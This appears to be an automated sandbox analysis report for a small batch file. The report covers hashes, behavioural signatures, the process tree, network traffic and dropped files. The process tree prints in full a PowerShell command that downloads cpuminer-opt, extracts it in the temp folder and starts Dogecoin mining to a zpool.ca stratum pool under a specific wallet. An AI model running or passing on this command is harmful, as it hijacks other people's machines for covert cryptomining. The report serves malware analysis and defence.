Analysis

  • max time kernel
    1789s
  • max time network
    1798s
  • platform
    windows10-1703_x64
  • resource
    win10-20231215-ja
  • resource tags

    arch:x64, arch:x86, image:win10-20231215-ja, locale:ja-jp, os:windows10-1703-x64, system, windows
  • submitted
    03/02/2024, 14:14 UTC

General

  • Target

    73u3Ito.bat

  • Size

    499B

  • MD5

    fe74bff27516829a88cfbc6f6e99646f

  • SHA1

    0c15d859211c79910b277d07e729bec7197a60cd

  • SHA256

    b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb

  • SHA512

    a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:780
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4980
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1960
        • C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:4728

Network

  • flag-us
    DNS
    github.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    github.com
    IN A
    Response
    github.com
    IN A
    140.82.121.4
  • flag-de
    GET
    https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip
    powershell.exe
    Remote address:
    140.82.121.4:443
    Request
    GET /JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; ja-JP) WindowsPowerShell/5.1.15063.0
    Host: github.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 302 Found
    Server: GitHub.com
    Date: Sat, 03 Feb 2024 14:17:32 GMT
    Content-Type: text/html; charset=utf-8
    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
    Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/51284118/46f2f116-d014-4e7d-b81d-eea84bd0fd1a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240203%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240203T141732Z&X-Amz-Expires=300&X-Amz-Signature=da3282b12285756d8766eff6e650ab39bfa6bdf60f55d7f06c2b93b56b60c5d9&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=51284118&response-content-disposition=attachment%3B%20filename%3Dcpuminer-opt-23.15-windows.zip&response-content-type=application%2Foctet-stream
    Cache-Control: no-cache
    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
    X-Frame-Options: deny
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 0
    Referrer-Policy: no-referrer-when-downgrade
    Content-Length: 0
    X-GitHub-Request-Id: C2A6:157F55:1E5F6E28:1EBEEF03:65BE4B06
  • flag-us
    DNS
    objects.githubusercontent.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    objects.githubusercontent.com
    IN A
    Response
    objects.githubusercontent.com
    IN A
    185.199.108.133
    objects.githubusercontent.com
    IN A
    185.199.109.133
    objects.githubusercontent.com
    IN A
    185.199.110.133
    objects.githubusercontent.com
    IN A
    185.199.111.133
  • flag-us
    GET
    https://objects.githubusercontent.com/github-production-release-asset-2e65be/51284118/46f2f116-d014-4e7d-b81d-eea84bd0fd1a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240203%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240203T141732Z&X-Amz-Expires=300&X-Amz-Signature=da3282b12285756d8766eff6e650ab39bfa6bdf60f55d7f06c2b93b56b60c5d9&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=51284118&response-content-disposition=attachment%3B%20filename%3Dcpuminer-opt-23.15-windows.zip&response-content-type=application%2Foctet-stream
    powershell.exe
    Remote address:
    185.199.108.133:443
    Request
    GET /github-production-release-asset-2e65be/51284118/46f2f116-d014-4e7d-b81d-eea84bd0fd1a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240203%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240203T141732Z&X-Amz-Expires=300&X-Amz-Signature=da3282b12285756d8766eff6e650ab39bfa6bdf60f55d7f06c2b93b56b60c5d9&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=51284118&response-content-disposition=attachment%3B%20filename%3Dcpuminer-opt-23.15-windows.zip&response-content-type=application%2Foctet-stream HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; ja-JP) WindowsPowerShell/5.1.15063.0
    Host: objects.githubusercontent.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Connection: keep-alive
    Content-Length: 18353564
    Content-Type: application/octet-stream
    Content-MD5: o9vnhIGbDner0qCCrwwyiA==
    Last-Modified: Thu, 30 Nov 2023 19:41:07 GMT
    ETag: "0x8DBF1DC4BEC4077"
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: d190fa92-001e-0015-362f-4ff6e6000000
    x-ms-version: 2020-10-02
    x-ms-creation-time: Thu, 30 Nov 2023 19:41:07 GMT
    x-ms-lease-status: unlocked
    x-ms-lease-state: available
    x-ms-blob-type: BlockBlob
    Content-Disposition: attachment; filename=cpuminer-opt-23.15-windows.zip
    x-ms-server-encrypted: true
    Via: 1.1 varnish, 1.1 varnish
    Accept-Ranges: bytes
    Age: 3348
    Date: Sat, 03 Feb 2024 14:17:43 GMT
    X-Served-By: cache-iad-kcgs7200050-IAD, cache-lhr7334-LHR
    X-Cache: HIT, HIT
    X-Cache-Hits: 628, 0
    X-Timer: S1706969863.881993,VS0,VE323
  • flag-us
    DNS
    4.121.82.140.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    4.121.82.140.in-addr.arpa
    IN PTR
    Response
    4.121.82.140.in-addr.arpa
    IN PTR
    lb-140-82-121-4-fra.github.com
  • flag-us
    DNS
    133.108.199.185.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.108.199.185.in-addr.arpa
    IN PTR
    Response
    133.108.199.185.in-addr.arpa
    IN PTR
    cdn-185-199-108-133.github.com
  • flag-us
    DNS
    yespower.na.mine.zpool.ca
    cpuminer-sse2.exe
    Remote address:
    8.8.8.8:53
    Request
    yespower.na.mine.zpool.ca
    IN A
    Response
    yespower.na.mine.zpool.ca
    IN A
    198.50.168.213
  • flag-us
    DNS
    23.236.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    23.236.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    89.16.208.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    89.16.208.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    240.221.184.93.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    240.221.184.93.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    213.168.50.198.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    213.168.50.198.in-addr.arpa
    IN PTR
    Response
    213.168.50.198.in-addr.arpa
    IN PTR
    mine.zpool.ca
  • 140.82.121.4:443
    https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip
    tls, http
    powershell.exe
    918 B
    7.0kB
    9
    7

    HTTP Request

    GET https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip

    HTTP Response

    302
  • 185.199.108.133:443
    https://objects.githubusercontent.com/github-production-release-asset-2e65be/51284118/46f2f116-d014-4e7d-b81d-eea84bd0fd1a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240203%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240203T141732Z&X-Amz-Expires=300&X-Amz-Signature=da3282b12285756d8766eff6e650ab39bfa6bdf60f55d7f06c2b93b56b60c5d9&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=51284118&response-content-disposition=attachment%3B%20filename%3Dcpuminer-opt-23.15-windows.zip&response-content-type=application%2Foctet-stream
    tls, http
    powershell.exe
    130.1kB
    7.5MB
    2807
    5445

    HTTP Request

    GET https://objects.githubusercontent.com/github-production-release-asset-2e65be/51284118/46f2f116-d014-4e7d-b81d-eea84bd0fd1a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAVCODYLSA53PQK4ZA%2F20240203%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240203T141732Z&X-Amz-Expires=300&X-Amz-Signature=da3282b12285756d8766eff6e650ab39bfa6bdf60f55d7f06c2b93b56b60c5d9&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=51284118&response-content-disposition=attachment%3B%20filename%3Dcpuminer-opt-23.15-windows.zip&response-content-type=application%2Foctet-stream

    HTTP Response

    200
  • 198.50.168.213:6234
    yespower.na.mine.zpool.ca
    cpuminer-sse2.exe
    156 B
    3
  • 198.50.168.213:6234
    yespower.na.mine.zpool.ca
    cpuminer-sse2.exe
    156 B
    3
  • 127.0.0.1:49929
    cpuminer-sse2.exe
  • 127.0.0.1:49931
    cpuminer-sse2.exe
  • 127.0.0.1:49949
    cpuminer-sse2.exe
  • 127.0.0.1:49951
    cpuminer-sse2.exe
  • 198.50.168.213:6234
    yespower.na.mine.zpool.ca
    cpuminer-sse2.exe
    156 B
    3
  • 127.0.0.1:49970
    cpuminer-sse2.exe
  • 127.0.0.1:49972
    cpuminer-sse2.exe
  • 198.50.168.213:6234
    yespower.na.mine.zpool.ca
    cpuminer-sse2.exe
    156 B
    3
  • 127.0.0.1:49992
    cpuminer-sse2.exe
  • 127.0.0.1:49994
    cpuminer-sse2.exe
  • 127.0.0.1:50012
    cpuminer-sse2.exe
  • 127.0.0.1:50014
    cpuminer-sse2.exe
  • 198.50.168.213:6234
    yespower.na.mine.zpool.ca
    cpuminer-sse2.exe
    156 B
    3
  • 198.50.168.213:6234
    yespower.na.mine.zpool.ca
    cpuminer-sse2.exe
    156 B
    3
  • 127.0.0.1:50033
    cpuminer-sse2.exe
  • 127.0.0.1:50035
    cpuminer-sse2.exe
  • 198.50.168.213:6234
    yespower.na.mine.zpool.ca
    cpuminer-sse2.exe
    156 B
    3
  • 127.0.0.1:50053
    cpuminer-sse2.exe
  • 127.0.0.1:50055
    cpuminer-sse2.exe
  • 127.0.0.1:50073
    cpuminer-sse2.exe
  • 127.0.0.1:50075
    cpuminer-sse2.exe
  • 198.50.168.213:6234
    yespower.na.mine.zpool.ca
    cpuminer-sse2.exe
    57.4kB
    45.5kB
    552
    320
  • 8.8.8.8:53
    github.com
    dns
    powershell.exe
    56 B
    72 B
    1
    1

    DNS Request

    github.com

    DNS Response

    140.82.121.4

  • 8.8.8.8:53
    objects.githubusercontent.com
    dns
    powershell.exe
    75 B
    139 B
    1
    1

    DNS Request

    objects.githubusercontent.com

    DNS Response

    185.199.108.133
    185.199.109.133
    185.199.110.133
    185.199.111.133

  • 8.8.8.8:53
    4.121.82.140.in-addr.arpa
    dns
    71 B
    115 B
    1
    1

    DNS Request

    4.121.82.140.in-addr.arpa

  • 8.8.8.8:53
    133.108.199.185.in-addr.arpa
    dns
    74 B
    118 B
    1
    1

    DNS Request

    133.108.199.185.in-addr.arpa

  • 8.8.8.8:53
    yespower.na.mine.zpool.ca
    dns
    cpuminer-sse2.exe
    71 B
    87 B
    1
    1

    DNS Request

    yespower.na.mine.zpool.ca

    DNS Response

    198.50.168.213

  • 8.8.8.8:53
    23.236.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    23.236.111.52.in-addr.arpa

  • 8.8.8.8:53
    89.16.208.104.in-addr.arpa
    dns
    72 B
    146 B
    1
    1

    DNS Request

    89.16.208.104.in-addr.arpa

  • 8.8.8.8:53
    240.221.184.93.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    240.221.184.93.in-addr.arpa

  • 8.8.8.8:53
    213.168.50.198.in-addr.arpa
    dns
    73 B
    100 B
    1
    1

    DNS Request

    213.168.50.198.in-addr.arpa

MITRE ATT&CK Matrix

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wfkkgpix.zdf.ps1

    Filesize

    1B

  • C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

    Filesize

    543KB

  • C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.exe

    Filesize

    227KB

  • C:\Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

    Filesize

    304KB

  • C:\Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

    Filesize

    378KB

  • C:\Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

    Filesize

    569KB

  • C:\Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

    Filesize

    341KB

  • \Users\Admin\AppData\Local\Temp\cpuminer\libcurl-4.dll

    Filesize

    392KB

  • \Users\Admin\AppData\Local\Temp\cpuminer\libgcc_s_seh-1.dll

    Filesize

    462KB

  • \Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

    Filesize

    323KB

  • \Users\Admin\AppData\Local\Temp\cpuminer\libstdc++-6.dll

    Filesize

    702KB

  • \Users\Admin\AppData\Local\Temp\cpuminer\libwinpthread-1.dll

    Filesize

    156KB
